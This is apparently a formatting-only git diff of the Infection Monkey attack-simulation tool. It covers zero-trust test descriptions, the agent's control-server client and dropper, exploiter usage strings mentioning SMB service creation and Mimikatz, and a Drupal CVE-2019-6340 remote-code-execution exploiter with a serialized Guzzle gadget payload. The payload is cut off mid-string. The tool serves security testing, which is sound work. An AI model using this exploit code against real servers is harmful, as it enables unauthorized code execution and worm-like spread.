POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_POSTGRESQL: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
TEST_DATA_ENDPOINT_POSTGRESQL:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
" it in in-transit.",
STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, "
"look for alerts that "
"indicate attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
TEST_TUNNELING:{
TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies "
"are too permissive - "
"restrict them. "
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED],
},
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
TEST_COMMUNICATE_AS_NEW_USER:{
TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate "
"with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies "
"are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.",
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES:{
TEST_EXPLANATION_KEY:"ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED:"ScoutSuite found no problems with cloud firewall rules.",
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
TEST_SCOUTSUITE_UNENCRYPTED_DATA:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources with unencrypted data.",
STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not "
"protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources not protected against data loss.",
STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.",
},
PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found issues related to users' authentication.",
STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.",
},
PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found permissive user access policies.",
STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found permissive user access policies.",
STATUS_PASSED:"ScoutSuite found no issues related to user access policies.",
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_LOGGING: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found logging issues.",
STATUS_PASSED: "ScoutSuite found no logging issues.",
TEST_SCOUTSUITE_LOGGING:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found logging issues.",
STATUS_PASSED:"ScoutSuite found no logging issues.",
},
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SERVICE_SECURITY: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found service security issues.",
STATUS_PASSED: "ScoutSuite found no service security issues.",
TEST_SCOUTSUITE_SERVICE_SECURITY:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found service security issues.",
STATUS_PASSED:"ScoutSuite found no service security issues.",
},
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
}
@ -284,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
DATA: [],
PEOPLE: [],
NETWORKS: [],
DEVICES: [],
WORKLOADS: [],
VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION: [],
DATA:[],
PEOPLE:[],
NETWORKS:[],
DEVICES:[],
WORKLOADS:[],
VISIBILITY_ANALYTICS:[],
AUTOMATION_ORCHESTRATION:[],
}
PRINCIPLES_TO_TESTS = {}

View File

@ -159,7 +159,8 @@ class SingleIpRange(NetworkRange):
@staticmethod
def string_to_host(string_):
"""
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name
and ip
:param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""

View File

@ -4,8 +4,10 @@ from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (https://tools.ietf.org/html/rfc1738#section-3.1)
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (
https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (
https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""

View File

@ -14,8 +14,10 @@ def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
:param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
:param subnet: Subnet to check if one of ip_addresses is in there. This is
common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise
returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):

View File

@ -14,27 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service "
"via MS-SCMR.",
}
MIMIKATZ = {
ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value:"Monkey tried to load Mimikatz DLL, but failed.",
}
MIMIKATZ_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
ScanStatus.USED.value:"WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value:"Monkey tried to call WinAPI to load mimikatz.",
}
DROPPER = {
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's "
"process.",
ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton"
" for monkey process wasn't successful.",
}
DROPPER_WINAPI = {
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}

View File

@ -1,4 +1,5 @@
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for
# details).
import argparse
from pathlib import Path
@ -17,7 +18,8 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
"-b", "--build", default=BUILD, help="Choose the build string for this version.",
type=str
)
args = parser.parse_args()
print(get_version(args.build))

View File

@ -227,7 +227,8 @@ class Configuration(object):
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data
plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.

View File

@ -23,7 +23,6 @@ from infection_monkey.utils.exceptions.planned_shutdown_exception import Planned
__author__ = "hoffer"
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@ -32,7 +31,8 @@ DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# random number greater than 5,
# to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere.
# to prevent the monkey from just waiting forever to try and connect to an island before going
# elsewhere.
TIMEOUT_IN_SECONDS = 15
@ -52,13 +52,13 @@ class ControlClient(object):
has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = {
"guid": GUID,
"hostname": hostname,
"ip_addresses": local_ips(),
"description": " ".join(platform.uname()),
"internet_access": has_internet_access,
"config": WormConfiguration.as_dict(),
"parent": parent,
"guid":GUID,
"hostname":hostname,
"ip_addresses":local_ips(),
"description":" ".join(platform.uname()),
"internet_access":has_internet_access,
"config":WormConfiguration.as_dict(),
"parent":parent,
}
if ControlClient.proxies:
@ -67,7 +67,7 @@ class ControlClient(object):
requests.post(
"https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=20,
@ -134,14 +134,15 @@ class ControlClient(object):
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -154,18 +155,20 @@ class ControlClient(object):
)
return
try:
telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}
requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
"https://%s/api/telemetry" % (WormConfiguration.current_server,),
# noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -173,18 +176,19 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return
try:
telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
telemetry = {"monkey_guid":GUID, "log":json.dumps(log)}
requests.post(
"https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -202,7 +206,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return
@ -233,15 +238,16 @@ class ControlClient(object):
requests.patch(
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({"config_error": True}),
headers={"content-type": "application/json"},
data=json.dumps({"config_error":True}),
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -281,7 +287,7 @@ class ControlClient(object):
else:
arch = "x86_64"
return {"os": {"type": os, "machine": arch}}
return {"os":{"type":os, "machine":arch}}
@staticmethod
def download_monkey_exe_by_filename(filename, size):
@ -310,7 +316,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -326,7 +333,7 @@ class ControlClient(object):
"https://%s/api/monkey/download"
% (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -343,7 +350,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return None, None
@ -371,7 +379,8 @@ class ControlClient(object):
def get_pba_file(filename):
try:
return requests.get(
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename),
# noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -412,7 +421,10 @@ class ControlClient(object):
@staticmethod
def can_island_see_port(port):
try:
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
url = (
f"https://{WormConfiguration.current_server}/api/monkey_control"
f"/check_remote_port/{port}"
)
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
response = json.loads(response.content.decode())
return response["status"] == "port_visible"
@ -423,7 +435,7 @@ class ControlClient(object):
def report_start_on_island():
requests.post(
f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({"started_on_island": True}),
data=json.dumps({"started_on_island":True}),
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)

View File

@ -53,8 +53,8 @@ class MonkeyDrops(object):
self.opts, _ = arg_parser.parse_known_args(args)
self._config = {
"source_path": os.path.abspath(sys.argv[0]),
"destination_path": self.opts.location,
"source_path":os.path.abspath(sys.argv[0]),
"destination_path":self.opts.location,
}
def initialize(self):
@ -147,20 +147,21 @@ class MonkeyDrops(object):
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
MONKEY_CMDLINE_WINDOWS % {"monkey_path":self._config["destination_path"]}
+ monkey_options
)
else:
dest_path = self._config["destination_path"]
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
# In linux we have a more complex commandline. There's a general outer one,
# and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
+ monkey_options
)
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
"monkey_directory": dest_path[0 : dest_path.rfind("/")],
"monkey_commandline": inner_monkey_cmdline,
"monkey_directory":dest_path[0: dest_path.rfind("/")],
"monkey_commandline":inner_monkey_cmdline,
}
monkey_process = subprocess.Popen(
@ -188,7 +189,8 @@ class MonkeyDrops(object):
try:
if (
(self._config["source_path"].lower() != self._config["destination_path"].lower())
(self._config["source_path"].lower() != self._config[
"destination_path"].lower())
and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first
):
@ -207,7 +209,8 @@ class MonkeyDrops(object):
dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
):
LOG.debug(
"Error marking source file '%s' for deletion on next boot (error %d)",
"Error marking source file '%s' for deletion on next boot (error "
"%d)",
self._config["source_path"],
ctypes.windll.kernel32.GetLastError(),
)

View File

@ -10,7 +10,6 @@ from infection_monkey.utils.plugins.plugin import Plugin
__author__ = "itamar"
logger = logging.getLogger(__name__)
@ -37,7 +36,8 @@ class HostExploiter(Plugin):
EXPLOIT_TYPE = ExploitType.VULNERABILITY
# Determines if successful exploitation should stop further exploit attempts on that machine.
# Generally, should be True for RCE type exploiters and False if we don't expect the exploiter to run the monkey agent.
# Generally, should be True for RCE type exploiters and False if we don't expect the
# exploiter to run the monkey agent.
# Example: Zerologon steals credentials
RUNS_AGENT_ON_SUCCESS = True
@ -49,12 +49,12 @@ class HostExploiter(Plugin):
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {
"display_name": self._EXPLOITED_SERVICE,
"started": "",
"finished": "",
"vulnerable_urls": [],
"vulnerable_ports": [],
"executed_cmds": [],
"display_name":self._EXPLOITED_SERVICE,
"started":"",
"finished":"",
"vulnerable_urls":[],
"vulnerable_ports":[],
"executed_cmds":[],
}
self.exploit_attempts = []
self.host = host
@ -76,12 +76,12 @@ class HostExploiter(Plugin):
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append(
{
"result": result,
"user": user,
"password": password,
"lm_hash": lm_hash,
"ntlm_hash": ntlm_hash,
"ssh_key": ssh_key,
"result":result,
"user":user,
"password":password,
"lm_hash":lm_hash,
"ntlm_hash":ntlm_hash,
"ssh_key":ssh_key,
}
)
@ -120,4 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})
self.exploit_info["executed_cmds"].append({"cmd":cmd, "powershell":powershell})

View File

@ -1,7 +1,8 @@
"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
/f9f6a5bb6605745e292bee3a4079f261d891738a.
"""
import logging
@ -28,7 +29,8 @@ class DrupalExploiter(WebRCE):
def get_exploit_config(self):
"""
We override this function because the exploits requires a special extension in the URL, "node",
We override this function because the exploits requires a special extension in the URL,
"node",
e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
:return: the Drupal exploit config
"""
@ -42,7 +44,8 @@ class DrupalExploiter(WebRCE):
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
"""
We need a specific implementation of this function in order to add the URLs *with the node IDs*.
We need a specific implementation of this function in order to add the URLs *with the
node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
@ -71,7 +74,8 @@ class DrupalExploiter(WebRCE):
def check_if_exploitable(self, url):
"""
Check if a certain URL is exploitable.
We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
We use this specific implementation (and not simply run self.exploit) because this
function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
@ -81,7 +85,7 @@ class DrupalExploiter(WebRCE):
response = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
headers={"Content-Type":"application/hal+json"},
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
@ -101,7 +105,7 @@ class DrupalExploiter(WebRCE):
r = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
headers={"Content-Type":"application/hal+json"},
verify=False,
timeout=LONG_REQUEST_TIMEOUT,
)
@ -117,7 +121,8 @@ class DrupalExploiter(WebRCE):
def get_target_url(self):
"""
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
We're overriding this method such that every time self.exploit is invoked, we use a fresh
vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
"""
@ -128,13 +133,15 @@ class DrupalExploiter(WebRCE):
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
"""
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey, chmod it and run it.
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
# chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
LOG.info(
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
f"Drupal server "
f"but only {num_available_urls} found"
)
return result
@ -164,20 +171,20 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
payload = {
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type": {"target_id": "article"},
"title": {"value": "My Article"},
"body": {"value": ""},
"_links":{"type":{"href":f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type":{"target_id":"article"},
"title":{"value":"My Article"},
"body":{"value":""},
}
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
"link": [
"link":[
{
"value": "link",
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
"value":"link",
"options":'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
